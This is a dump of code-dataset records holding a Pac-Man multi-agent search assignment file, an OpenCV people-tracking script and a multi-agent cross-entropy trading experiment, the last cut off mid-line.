getAction(self, gameState):\n \"\"\"\n getAction chooses among the best options according to the evaluation function.\n\n getAction takes a GameState and returns some Directions.X for some X in the set {North, South, West, East, Stop}\n ------------------------------------------------------------------------------\n Description of GameState and helper functions:\n\n A GameState specifies the full game state, including the food, capsules,\n agent configurations and score changes. In this function, the |gameState| argument\n is an object of GameState class. 
Following are a few of the helper methods that you\n can use to query a GameState object to gather information about the present state\n of Pac-Man, the ghosts and the maze.\n\n gameState.getLegalActions():\n Returns the legal actions for the agent specified. Returns Pac-Man's legal moves by default.\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor state after the specified agent takes the action.\n Pac-Man is always agent 0.\n gameState.getPacmanState():\n Returns an AgentState object for pacman (in game.py)\n state.configuration.pos gives the current position\n state.direction gives the travel vector\n\n gameState.getGhostStates():\n Returns list of AgentState objects for the ghosts\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n\n gameState.getScore():\n Returns the score corresponding to the current state of the game\n\n\n The GameState class is defined in pacman.py and you might want to look into that for\n other helper methods, though you don't need to.\n \"\"\"\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n The evaluation function takes in the current and proposed successor\n GameStates (pacman.py) and returns a number, where higher numbers are better.\n\n The code below extracts some useful information from the state, like the\n remaining food (oldFood) and Pacman position after moving (newPos).\n newScaredTimes holds the number of moves that each ghost will remain\n scared because of Pacman having eaten a power pellet.\n \"\"\"\n # Useful information you can extract from a GameState (pacman.py)\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n newPos = successorGameState.getPacmanPosition()\n oldFood = currentGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n\n return successorGameState.getScore()\n\n\ndef scoreEvaluationFunction(currentGameState):\n \"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n\n This evaluation function is meant for use with adversarial search agents\n (not reflex agents).\n \"\"\"\n return currentGameState.getScore()\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. 
Agent (game.py)\n is another abstract class.\n \"\"\"\n def breaktie(self, actions, gameState):\n food = gameState.getFood()\n #print(\"Length: {}\".format(len(gameState.getFood().asList())))\n # print(gameState.getFood().asList())\n aa = None\n bb = None\n for x in range(food.width):\n for y in range(food.height):\n if(food[x][y] == True):\n if(aa != None):\n bb = [x,y]\n break\n aa = [x, y]\n\n if(bb != None):\n break\n\n # print(\"food position: {}\".format(aa))\n if(bb == None):\n bb = aa\n min_dis = float('+inf')\n min_action = []\n for a in actions:\n dis = manhattanDistance(aa,gameState.generateSuccessor(0,a).getPacmanPosition() )+ manhattanDistance(bb, gameState.generateSuccessor(0,a).getPacmanPosition() )\n if(dis < min_dis):\n min_dis = dis\n del min_action[:]\n min_action.append(a)\n elif(dis == min_dis):\n min_action.append(a)\n\n return random.choice(min_action)\n\n def __init__(self, evalFn = 'EvaluationFunction_6features', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n\n######################################################################################\n# Problem 1b: implementing minimax\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Returns the minimax action from the current gameState using self.depth\n and self.evaluationFunction. Terminal states can be found by one of the following:\n pacman won, pacman lost or there are no legal moves.\n \n Here are some method calls that might be useful when implementing minimax.\n \n gameState.getLegalActions(agentIndex):\n Returns a list of legal actions for an agent\n agentIndex=0 means Pacman, ghosts are >= 1\n \n Directions.STOP:\n The stop direction, which is always legal\n \n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n \n gameState.getNumAgents():\n Returns the total number of agents in the game\n \n gameState.getScore():\n Returns the score corresponding to the current state of the game\n \n gameState.isWin():\n Returns True if it's a winning state\n \n gameState.isLose():\n Returns True if it's a losing state\n \n self.depth:\n The depth to which search should continue\n \n \"\"\"\n\n def getAction(self, gameState):\n #get all actions pacman can move\n legalMoves = gameState.getLegalActions(0)\n\n #find best action\n max_action = []\n max_val = float('-inf')\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(0, action), self.depth, 1)\n if(eval == max_val):\n max_action.append(action)\n elif(eval > max_val):\n del max_action[:]\n max_action.append(action)\n max_val = eval\n\n if(len(max_action) == 1):\n return max_action[0]\n else:\n return self.breaktie(max_action, gameState)\n\n def minimax(self, gameState, depth, agentIndex):\n #if all ghost's makes a move, this depth is finished\n if(agentIndex >= gameState.getNumAgents()):\n # move to next depth, start with pacman: agentIndex==0\n return self.minimax(gameState, depth-1, 0)\n\n if(depth == 0 or len(gameState.getLegalActions(agentIndex)) == 0):\n #print(\"Get evalution score {}\".format(self.evaluationFunction(gameState)) )\n return self.evaluationFunction(gameState)\n\n legalMoves = gameState.getLegalActions(agentIndex)\n\n if(agentIndex == 0): # if pacman's move\n max_val = float('-inf')\n max_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1)\n\n if(eval > max_val):\n 
max_action = action\n max_val = eval\n return max_val\n\n else:#if ghost's move\n min_val = float('+inf')\n min_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1)\n if(eval < min_val):\n min_action = action\n min_val = eval\n return min_val\n\n\n\nclass AlphaBetaAgent(MultiAgentSearchAgent):\n\n def getAction(self, gameState):\n #get all actions pacman can move\n legalMoves = gameState.getLegalActions(0)\n #print\n #find best action\n max_action = []\n max_val = float('-inf')\n alpha = float('-inf')\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(0, action),\n self.depth, 1,\n alpha,\n float('+inf'))\n if(eval == max_val):\n max_action.append(action)\n elif(eval > max_val):\n del max_action[:]\n max_action.append(action)\n max_val = eval\n alpha = max(eval, alpha)\n\n if(len(max_action) == 1):\n return max_action[0]\n else:\n return self.breaktie(max_action, gameState)\n\n\n def minimax(self, gameState, depth, agentIndex, alpha, beta):\n if(agentIndex >= gameState.getNumAgents()):\n return self.minimax(gameState, depth-1, 0, alpha, beta)\n\n if(depth == 0 or len(gameState.getLegalActions(agentIndex)) == 0):\n return self.evaluationFunction(gameState)\n\n legalMoves = gameState.getLegalActions(agentIndex)\n\n if(agentIndex == 0): # if pacman's move\n max_val = float('-inf')\n max_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1,\n alpha,\n beta)\n\n if(eval > max_val):\n max_action = action\n max_val = eval\n alpha = max(alpha, eval)\n if(alpha >= beta):\n break\n return max_val\n\n else:#if ghost's move\n min_val = float('+inf')\n min_action = None\n for action in legalMoves:\n eval = self.minimax( gameState.generateSuccessor(agentIndex, action),\n depth,\n agentIndex+1,\n alpha,\n beta)\n if(eval < min_val):\n min_action = action\n min_val = eval\n beta = min(beta, eval)\n if(beta <= alpha):\n break\n return min_val\n\n\n\nclass ExpectimaxAgent(MultiAgentSearchAgent):\n def getAction(self, gameState):\n # Get all legal actions for pacman\n legalMoves = gameState.getLegalActions(0)\n max_action = None\n max_val = float('-inf')\n\n for action in legalMoves:\n eval = self.Expectimax(gameState.generateSuccessor(0, action), 1, self.depth)\n # Finding the max value and return the action\n if(eval >= max_val):\n max_action = action\n max_val = eval\n\n return max_action\n\n def Expectimax(self, gameState, agentIndex, depth):\n # If all agent in current depth has moved\n if(agentIndex >= gameState.getNumAgents()):\n # Moving to the next depth starting with pacman\n return self.Expectimax(gameState, 0, depth-1)\n\n if(depth == 0 or len(gameState.getLegalActions(agentIndex)) == 0):\n #print(\"Get evalution score {}\".format(self.evaluationFunction(gameState)) )\n return self.evaluationFunction(gameState)\n\n\n\n legalMoves = gameState.getLegalActions(agentIndex)\n\n if(agentIndex == 0): # if pacman's move\n max_val = float('-inf')\n sum_score_max = 0\n for action in legalMoves:\n eval = self.Expectimax( gameState.generateSuccessor(agentIndex, action),\n agentIndex+1,\n depth)\n if(eval > max_val):\n max_val = eval\n sum_score_max += max_val\n return max_val\n\n else:#if ghost's move\n min_val = float('+inf')\n sum_score_min = 0\n for action in legalMoves:\n eval = self.Expectimax( gameState.generateSuccessor(agentIndex, action),\n agentIndex+1,\n depth)\n if(eval < min_val):\n min_val = eval\n 
sum_score_min += min_val\n return sum_score_min/len(gameState.getLegalActions(agentIndex))\n\n\n######################################################################################\n# Problem 4a (extra credit): creating a better evaluation function\n\n\ndef EvaluationFunction_4features(currentGameState):\n\n pacman_loc = currentGameState.getPacmanPosition()\n ghosts_state = currentGameState.getGhostStates()\n\n #print\n \"\"\"1. game score\"\"\"\n evaluation_score = currentGameState.getScore() * 11\n #print(\"Place 1: {}\".format(evaluation_score))\n\n \"\"\"2. distance to the nearest food, the bigger the worse: negative score added\"\"\"\n food = currentGameState.getFood().asList()\n min_dis = float('+inf')\n for f in food:\n dis = manhattanDistance(pacman_loc, f)\n min_dis = min(dis, min_dis)\n\n if(len(food) == 0):\n evaluation_score += 10000\n else:\n evaluation_score -= min_dis * 6\n #print(\"Place 2: {}\".format(evaluation_score))\n\n \"\"\"3. distance to the nearest active ghost, the smaller the worse: positve score added\"\"\"\n scared_ghosts = []\n active_ghosts = []\n min_ghost_dis = float('+inf')\n for ghost in ghosts_state:\n if(ghost.scaredTimer > 0):\n scared_ghosts.append(ghost)\n else:\n active_ghosts.append(ghost)\n dis = manhattanDistance(ghost.getPosition(), pacman_loc)\n min_ghost_dis = min(dis, min_ghost_dis)\n\n #there are active ghosts\n if(len(active_ghosts) != 0):\n # with square we will care about this distance more when the ghost is close.\n evaluation_score += min_ghost_dis * min_ghost_dis * 0.4\n #print(\"Place 3: {}\".format(evaluation_score))\n\n\n\n \"\"\"4. number of food left + number of capsules left\n \"\"\"\n num_food = len(food)\n num_capsule = len(currentGameState.getCapsules())\n evaluation_score -= (num_food + num_capsule) * 10\n return evaluation_score\n\n\ndef EvaluationFunction_6features(currentGameState):\n\n pacman_loc = currentGameState.getPacmanPosition()\n ghosts_state = currentGameState.getGhostStates()\n\n\n \"\"\"1. game score\"\"\"\n evaluation_score = currentGameState.getScore() * 11\n #print(\"Place 1: {}\".format(evaluation_score))\n\n \"\"\"2. distance to the nearest food, the bigger the worse: negative score added\"\"\"\n food = currentGameState.getFood().asList()\n min_dis = float('+inf')\n for f in food:\n dis = manhattanDistance(pacman_loc, f)\n min_dis = min(dis, min_dis)\n\n if(len(food) == 0):\n evaluation_score += 10000\n else:\n evaluation_score -= min_dis * 6\n #print(\"Place 2: {}\".format(evaluation_score))\n\n \"\"\"3. distance to the nearest active ghost, the smaller the worse: positve score added\"\"\"\n scared_ghosts = []\n active_ghosts = []\n min_ghost_dis = float('+inf')\n for ghost in ghosts_state:\n if(ghost.scaredTimer > 0):\n scared_ghosts.append(ghost)\n else:\n active_ghosts.append(ghost)\n dis = manhattanDistance(ghost.getPosition(), pacman_loc)\n min_ghost_dis = min(dis, min_ghost_dis)\n\n #there are active ghosts\n if(len(active_ghosts) != 0):\n # with square we will care about this distance more when the ghost is close.\n evaluation_score += min_ghost_dis * min_ghost_dis * 0.4\n #print(\"Place 3: {}\".format(evaluation_score))\n\n\n #there are active ghosts\n if(len(active_ghosts) != 0):\n # with square we will care about this distance more when the ghost is close.\n if (min_ghost_dis <= 3):\n evaluation_score += min_ghost_dis * min_ghost_dis * 0.4\n #print(\"Place 3: {}\".format(evaluation_score))\n\n\n\n \"\"\"feature 4. 
distance to nearest scared ghost\"\"\"\n\n    min_scared = 0\n    for ghost in scared_ghosts:\n        dis = manhattanDistance(ghost.getPosition(), pacman_loc)\n        min_scared = min(min_scared, dis)\n    evaluation_score += 0.8 * min_scared\n\n\n    \"\"\"feature 5. number of legal actions\"\"\"\n    num_actions = len(currentGameState.getLegalActions(0))\n    evaluation_score += 0.4 * num_actions\n\n\n    \"\"\"feature 6. number of food left + number of capsules left\"\"\"\n    num_food = len(food)\n    num_capsule = len(currentGameState.getCapsules())\n    evaluation_score -= (num_food + num_capsule) * 10\n    #print(\"Place 6: {}\".format(evaluation_score))\n    return evaluation_score\n","sub_path":"pacmanAdversialSearch/AdversialSearchAgents.py","file_name":"AdversialSearchAgents.py","file_ext":"py","file_size_in_byte":18570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"163136884","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 10 14:32:12 2016\n\n@author: DennisLin\n\"\"\"\nimport numpy as np\nimport cv2\n#people detection \n#from __future__ import print_function\nfrom imutils.object_detection import non_max_suppression\nimport argparse\n#import imutils\nimport time\nfrom tqdm import tqdm\n#A = np.array([[1,2,3],[4,5,6],[7,8,9]])\n#\n#B = np.array([[1,1,1],[2,2,2],[3,3,3]])\n#\n#A = np.insert(A,0,[0,0,0],axis=0)\ndef unique_rows(a):\n    a = np.ascontiguousarray(a)\n    unique_a = np.unique(a.view([('', a.dtype)]*a.shape[1]))\n    return unique_a.view(a.dtype).reshape((unique_a.shape[0], a.shape[1]))\n\ndef distance(two_window_info, three_window_info):\n    three_window_info_tmp = three_window_info.copy()\n    haha = ()\n    for i in range(two_window_info.shape[0]):\n        distance = []\n        for j in range(three_window_info_tmp.shape[0]):\n            distance_tmp = np.linalg.norm(two_window_info[i]-three_window_info_tmp[j])\n            distance.append(distance_tmp)\n        distance_array = np.array(distance)\n        index = np.where(distance_array == distance_array.min())\n        mother = index[0][0]\n        haha = haha + (mother,)\n    three_window_info = np.delete(three_window_info, haha, axis = 0)\n    return three_window_info;\n    \n    \n    \ndef threewindow(record_info_clear_tmp):\n    row_limit = record_info_clear_tmp[record_info_clear_tmp.shape[0] - 1,0]\n    index_delete = ()\n    for i in tqdm(range( row_limit )):\n    \n        temp = np.where(record_info_clear_tmp[:,0] == i)\n        if len(temp[0]) != 0: \n            if temp[0].shape[0] == 2:\n                two_window = []\n                two_window = record_info_clear_tmp[temp[0],:]\n            if temp[0].shape[0] == 3:\n                my_answer = distance(two_window,record_info_clear_tmp[temp[0],:])\n#                print my_answer\n                index_tmp = np.where((record_info_clear_tmp[:] == my_answer[0]).all(axis = 1))\n                index_delete = index_delete + (index_tmp[0][0],)\n    record_info_clear = np.delete(record_info_clear_tmp, index_delete, axis = 0)\n    record_info_clear_x1 = (record_info_clear[:,1]*4 + record_info_clear[:,3]*1)/5 \n    record_info_clear_x2 = (record_info_clear[:,1]*1 + record_info_clear[:,3]*4)/5\n    record_info_clear[:,1] = record_info_clear_x1\n    record_info_clear[:,3] = record_info_clear_x2\n    return record_info_clear\n\ndef selectwindow(record_info_clear):\n\n    checkpoint = 0 #if 0 then a, if 1 then b\n    person_A = []\n    person_B = []\n#    if record_info_clear[0,1] < 130: #initialize\n    person_A_temp = record_info_clear[0]\n    person_A.append(person_A_temp)\n    person_A_info = np.array(person_A)\n    person_B_info = np.array([])\n    checkpoint = 0\n#    elif record_info_clear[0,1] > 130:\n#        person_B_temp = record_info_clear[0]\n#        person_B.append(person_B_temp)\n#        
person_B_info = np.array(person_B)\n# person_A_info = np.array([])\n# checkpoint = 1\n [row_record_info_clear,col_record_info_clear] = np.shape(record_info_clear)\n\n \n \n for i in range(row_record_info_clear-1):\n# if (record_info_clear[i+2,0] == record_info_clear[i,0]):\n# \n if (record_info_clear[i+1,0] != record_info_clear[i,0]):\n if checkpoint == 0:\n center_dist = np.linalg.norm((record_info_clear[i+1,1]+record_info_clear[i+1,3])-(record_info_clear[i,1]+record_info_clear[i,3]))\n if center_dist <= 5:\n person_A_temp = record_info_clear[i+1]\n person_A.append(person_A_temp)\n person_A_info = np.array(person_A)\n checkpoint = 0\n elif (center_dist > 5) and (center_dist <= 55):\n record_info_clear[i+1,1:5] = record_info_clear[i,1:5] \n else:\n person_B_temp = record_info_clear[i+1]\n person_B.append(person_B_temp)\n person_B_info = np.array(person_B)\n checkpoint = 1 \n else: \n center_dist = np.linalg.norm((record_info_clear[i+1,1]+record_info_clear[i+1,3])-(record_info_clear[i,1]+record_info_clear[i,3]))\n if center_dist <= 5:\n person_B_temp = record_info_clear[i+1]\n person_B.append(person_B_temp)\n person_B_info = np.array(person_B)\n checkpoint = 1 \n elif (center_dist > 5) and (center_dist <= 55):\n record_info_clear[i+1,1:5] = record_info_clear[i,1:5] \n else:\n person_A_temp = record_info_clear[i+1]\n person_A.append(person_A_temp)\n person_A_info = np.array(person_A)\n checkpoint = 0 \n elif (record_info_clear[i+1,0] == record_info_clear[i,0]):# same frame\n if checkpoint == 0:\n person_B_temp = record_info_clear[i+1]\n person_B.append(person_B_temp)\n person_B_info = np.array(person_B) \n checkpoint = 1\n else:\n person_A_temp = record_info_clear[i+1]\n person_A.append(person_A_temp)\n person_A_info = np.array(person_A) \n checkpoint = 0 \n return (person_A_info, person_B_info)\nAnswerA = np.array([])\nAnswerB = np.array([])\n#record_info_clear = unique_rows(record_info)\n#record_info_clear = np.load('D://senior/CCL/record_info_clear_mask_NMS.npy')\nrecord_info2 = np.load('/Users/DennisLin/record_info_npy/April30_2sentence1_record_info.npy')\nrecord_info_clear_tmp = unique_rows(record_info2)\n###detect three window#####\nrecord_info_clear = threewindow(record_info_clear_tmp)\n\n(AnswerA,AnswerB) = selectwindow(record_info_clear) \n#record_info = np.load('D://senior/CCL/special_topic/record_info.npy')\n#record_info_clear = unique_rows(record_info)\n\ncamera = cv2.VideoCapture('/Users/DennisLin/Videos/April30/April30_2sentence1.mp4')\n\n#load the features\n#row = np.load('D://senior/CCL/special_topic/{April30_2sentence1.mpg}_out_features.npy')\n#[width, length] = row.shape\n#width = int(width)\n#length = int(length)\n\n## initialize the HOG descriptor/person detector\n#hog = cv2.HOGDescriptor()\n#hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\n\n# take first frame of the video\n#(grabbed,frame_old) = camera.read()\n##rame = frame_old[:,:,:]\n#frame = frame_old[:,:,:]\n#r = 400.0 / frame.shape[1]\n#dim = (400, int(frame.shape[0] * r))\n#frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n#(rects, weights) = hog.detectMultiScale(frame, winStride=(8, 8), padding=(32,32), scale=1.05)\n#rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\n#rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\n#pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)\nframe_num = 0\nindex_A = 0\nindex_B = 0\nfirst_AnswerA = AnswerA[0,0]\nfirst_AnswerB = AnswerB[0,0]\n#[row_A,col_A] = AnswerA.shape()\n#[row_B,col_B] = 
AnswerB.shape()\n\nnumber_A = 0\nnumber_B = 0\nwhile(camera.isOpened()):\n ret, frame = camera.read()\n if not ret:\n break\n r = 400.0 / frame.shape[1]\n dim = (400, int(frame.shape[0] * r))\n frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n print(index_A,frame_num,AnswerA[index_A,0])\n if frame_num == AnswerA[index_A,0]:\n cv2.rectangle(frame,(AnswerA[index_A,1],AnswerA[index_A,2]),(AnswerA[index_A,3], AnswerA[index_A,4]), (0, 255, 0), 2)\n number_A = (AnswerA[index_A,1]+AnswerA[index_A,3])\n index_A = index_A + 1\n [row_A,col_A] = np.shape(AnswerA)\n \n if index_A > row_A-1:\n AnswerA_temp1 = AnswerA[index_A-1,:].copy()\n AnswerA_temp1[0] = frame_num\n AnswerA = np.insert(AnswerA,index_A,AnswerA_temp1,axis = 0) \n elif frame_num < first_AnswerA:\n AnswerA_temp = AnswerA[index_A,:].copy()\n AnswerA_temp[0] = frame_num\n AnswerA = np.insert(AnswerA,index_A,AnswerA_temp,axis = 0)\n index_A = index_A + 1\n elif frame_num > first_AnswerA:\n AnswerA_temp2 = AnswerA[index_A-1,:].copy()\n AnswerA_temp2[0] = frame_num\n AnswerA = np.insert(AnswerA,index_A,AnswerA_temp2,axis = 0)\n cv2.rectangle(frame,(AnswerA[index_A,1],AnswerA[index_A,2]),(AnswerA[index_A,3], AnswerA[index_A,4]), (0, 255, 0), 2)\n number_A = (AnswerA[index_A,1]+AnswerA[index_A,3])\n index_A = index_A + 1\n \n \n if frame_num == AnswerB[index_B,0]:\n cv2.rectangle(frame,(AnswerB[index_B,1],AnswerB[index_B,2]),(AnswerB[index_B,3], AnswerB[index_B,4]), (0, 0, 255), 2)\n number_B = (AnswerB[index_B,1]+AnswerB[index_B,3])\n index_B = index_B + 1\n [row_B,col_B] = np.shape(AnswerB)\n if index_B > row_B-1:\n AnswerB_temp1 = AnswerB[index_B-1,:].copy()\n AnswerB_temp1[0] = frame_num\n AnswerB = np.insert(AnswerB,index_B,AnswerB_temp1,axis = 0) \n elif frame_num < first_AnswerB:\n AnswerB_temp = AnswerB[index_B,:].copy()\n AnswerB_temp[0] = frame_num\n AnswerB = np.insert(AnswerB,index_B,AnswerB_temp,axis = 0)\n index_B = index_B + 1\n elif frame_num > first_AnswerB:\n AnswerB_temp2 = AnswerB[index_B-1,:].copy()\n AnswerB_temp2[0] = frame_num\n AnswerB = np.insert(AnswerB,index_B,AnswerB_temp2,axis = 0)\n cv2.rectangle(frame,(AnswerB[index_B,1],AnswerB[index_B,2]),(AnswerB[index_B,3], AnswerB[index_B,4]), (0, 0, 255), 2)\n number_B = (AnswerB[index_B,1]+AnswerB[index_B,3])\n index_B = index_B + 1\n distance = np.linalg.norm(number_A-number_B)\n# for i in range(AnswerA.shape[0]) :\n# if frame_num == AnswerA[i,0]:\n# cv2.rectangle(frame, (AnswerA[i,1],AnswerA[i,2]), (AnswerA[i,3], AnswerA[i,4]), (0, 255, 0), 2)\n# index_A = index_A+1\n# elif frame_num != AnswerA[i,0] and index_A != 0:\n# cv2.rectangle(frame,(AnswerA[index_A-1,1],AnswerA[index_A-1,2]), (AnswerA[index_A-1,3], AnswerA[index_A-1,4]), (0, 255, 0), 2)\n# for i in range(AnswerB.shape[0]) :\n# if frame_num == AnswerB[i,0]:\n# cv2.rectangle(frame, (AnswerB[i,1],AnswerB[i,2]), (AnswerB[i,3], AnswerB[i,4]), (0, 0, 255), 2)\n# index_B = index_B +1;\n# elif frame_num != AnswerB[i,0] and index_B !=0:\n# cv2.rectangle(frame,(AnswerB[index_B-1,1],AnswerB[index_B-1,2]), (AnswerB[index_B-1,3], AnswerB[index_B-1,4]), (0, 0, 255), 2) \n cv2.putText(frame, \"Frame_index: {}\".format(frame_num), (10, 20),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n cv2.putText(frame, \"Distance: {}\".format(distance), (10, 40),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2) \n if frame_num > 600:\n cv2.imshow('frame',frame)\n \n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# elif frame_num == 8776:\n# break\n frame_num +=1\n# if frame_num == 8784:\n# 
break\nnp.save('/Users/DennisLin/AnswerA-21s_v2.npy', AnswerA)\nnp.save('/Users/DennisLin/AnswerB-21s_v2.npy', AnswerB)\n\ncamera.release()\ncv2.destroyAllWindows()\n#np.save('AnswerA.npy',AnswerA)\n#np.save('AnswerB.npy',AnswerB) ","sub_path":"Tracking_people.py","file_name":"Tracking_people.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"308236760","text":"import os\nimport datetime\nimport matplotlib.pylab as plt\nimport seaborn as sns\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom dos.target_functions import *\n\nsns.set()\nresult_dir = os.path.join(os.getcwd(), 'results/' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\nos.makedirs(result_dir)\n\nRUNS = 200\nRANGE = 4\nSTEPS = 200\nRESET_TRADE_STEPS = int(STEPS * 1.)\nSAMPLES = 100\nALPHA = .5\nALPHA_SHARE = .5\nPSI = .25\nINIT_STD = 1.\nMIN_STD = .2\nMIN_STD_SHARE = .2\nN_AGENTS = 4\nNON_SHARING = 1\n\ntarget_functions = {}\nfor i in range(N_AGENTS):\n target_functions[i] = generate_f(N_AGENTS)\n\nvalue_log = []\ntrade_log = []\n\nfor run in tqdm(range(RUNS)):\n for i in range(N_AGENTS):\n target_functions[i] = generate_f(N_AGENTS)\n\n independent_means = {}\n independent_stds = {}\n for i in range(N_AGENTS):\n independent_means[i] = 0.\n independent_stds[i] = INIT_STD\n\n for step in range(STEPS):\n samples = {}\n for i in range(N_AGENTS):\n samples[i] = np.random.normal(independent_means[i], independent_stds[i], size=SAMPLES)\n\n actions = [samples[i] for i in range(N_AGENTS)]\n\n values = {}\n mean_vs = {}\n\n for agent in range(N_AGENTS):\n values[agent] = target_functions[agent](actions)\n v = values[agent]\n mean_vs[agent] = np.mean(v)\n # TODO: log min and mean value\n log = {'run': run, 'type': 'independent', 'step': step, 'mean_value': mean_vs[agent], 'agent': agent}\n value_log.append(log)\n\n sort = sorted(zip(v, samples[agent])) # sorts ascending by value, low values first\n elite = sort[int(len(sort) * PSI):] # elite selection\n\n elite_a = [a for _, a in elite]\n independent_means[agent] = (1. - ALPHA) * independent_means[agent] + ALPHA * np.mean(elite_a)\n independent_stds[agent] = (1. 
- ALPHA) * independent_stds[agent] + ALPHA * np.std(elite_a)\n independent_stds[agent] = max(independent_stds[agent], MIN_STD)\n\n value = np.sum([mean_vs[i] for i in range(N_AGENTS)])\n log = {'run': run, 'type': 'independent', 'step': step, 'mean_value': value, 'agent': 'joint'}\n value_log.append(log)\n\n action_means = {}\n action_stds = {}\n trade_means = {}\n trade_stds = {}\n\n for i in range(N_AGENTS):\n action_means[i] = 0.\n action_stds[i] = INIT_STD\n trade_means[i] = 0.\n trade_stds[i] = INIT_STD\n\n for step in range(STEPS):\n # reset sharing distribution every RESET_TRADE_STEPS\n if step % RESET_TRADE_STEPS == 0:\n for i in range(N_AGENTS):\n trade_means[i] = 0.\n trade_stds[i] = INIT_STD\n\n # sample from policy p_i for each agent\n samples = {}\n trades = {}\n for i in range(N_AGENTS):\n samples[i] = np.random.normal(action_means[i], action_stds[i], size=SAMPLES)\n trades[i] = np.random.normal(trade_means[i], trade_stds[i], size=SAMPLES)\n\n actions = [samples[i] for i in range(N_AGENTS)]\n\n # evaluate actions and clip trades\n values = {}\n for agent in range(N_AGENTS):\n values[agent] = target_functions[agent](actions)\n trades[agent] = np.clip(trades[agent], 0, values[agent])\n # TODO: Trade target softmax?\n # TODO: How to deal with changing optimal trade?\n\n # trade\n for i in range(N_AGENTS - NON_SHARING):\n values[i] = values[i] - trades[i] + np.mean(\n [trades[j] for j in trades if j != i and j < N_AGENTS - NON_SHARING])\n\n for i in range(N_AGENTS - NON_SHARING):\n log = {'run': run, 'type': 'sharing', 'step': step, 'mean_trade': np.mean(trades[i]), 'agent': i}\n trade_log.append(log)\n\n mean_vs = {}\n\n # update policy p_i for each agent\n for agent in range(N_AGENTS):\n v = values[agent]\n mean_vs[agent] = np.mean(v)\n # TODO: log min and mean value\n log = {'run': run, 'type': 'sharing', 'step': step, 'mean_value': mean_vs[agent], 'agent': agent}\n value_log.append(log)\n\n sort = sorted(zip(v, zip(samples[agent], trades[agent]))) # sorts ascending by value, low values first\n elite = sort[int(len(sort) * PSI):]\n\n elite_a = [a for _, (a, t) in elite]\n action_means[agent] = (1. - ALPHA) * action_means[agent] + ALPHA * np.mean(elite_a)\n action_stds[agent] = (1. - ALPHA) * action_stds[agent] + ALPHA * np.std(elite_a)\n action_stds[agent] = max(action_stds[agent], MIN_STD)\n\n elite_t = [t for _, (a, t) in elite]\n trade_means[agent] = (1. - ALPHA_SHARE) * trade_means[agent] + ALPHA_SHARE * np.mean(elite_t)\n trade_stds[agent] = (1. 
- ALPHA_SHARE) * trade_stds[agent] + ALPHA_SHARE * np.std(elite_t)\n trade_stds[agent] = max(trade_stds[agent], MIN_STD_SHARE)\n\n value = np.sum([mean_vs[i] for i in range(N_AGENTS)])\n log = {'run': run, 'type': 'sharing', 'step': step, 'mean_value': value, 'agent': 'joint'}\n value_log.append(log)\n\ntext_file = open(result_dir + '/seed.txt', 'w')\ntext_file.write(str(seed))\ntext_file.close()\n\ndf = pd.DataFrame(value_log)\ndf.to_csv(result_dir + '/values.csv', sep='\\t', encoding='utf-8')\n\nfor agent in range(N_AGENTS):\n plt.figure(str(agent) + '_values')\n agent_df = df.loc[df['agent'] == agent]\n sns.tsplot(data=agent_df, time='step', value='mean_value', unit='run', condition='type') # ci='sd'\n plt.savefig(result_dir + '/values_' + str(agent) + '.png')\n\ndf_base = df.loc[df['type'] == 'independent']\ndf_sharing = df.loc[df['type'] == 'sharing']\nratios = df_sharing['mean_value'].values / df_base['mean_value'].values\ndf_sharing['ratio'] = pd.Series(ratios, index=df_sharing.index)\ndf_sharing = df_sharing.loc[df_sharing['agent'] != 'joint']\n\nplt.figure('ratios')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run', condition='agent')\nplt.savefig(result_dir + '/ratios.png')\n\nplt.figure('ratios_median')\nsns.tsplot(data=df_sharing, time='step', value='ratio', unit='run', condition='agent', 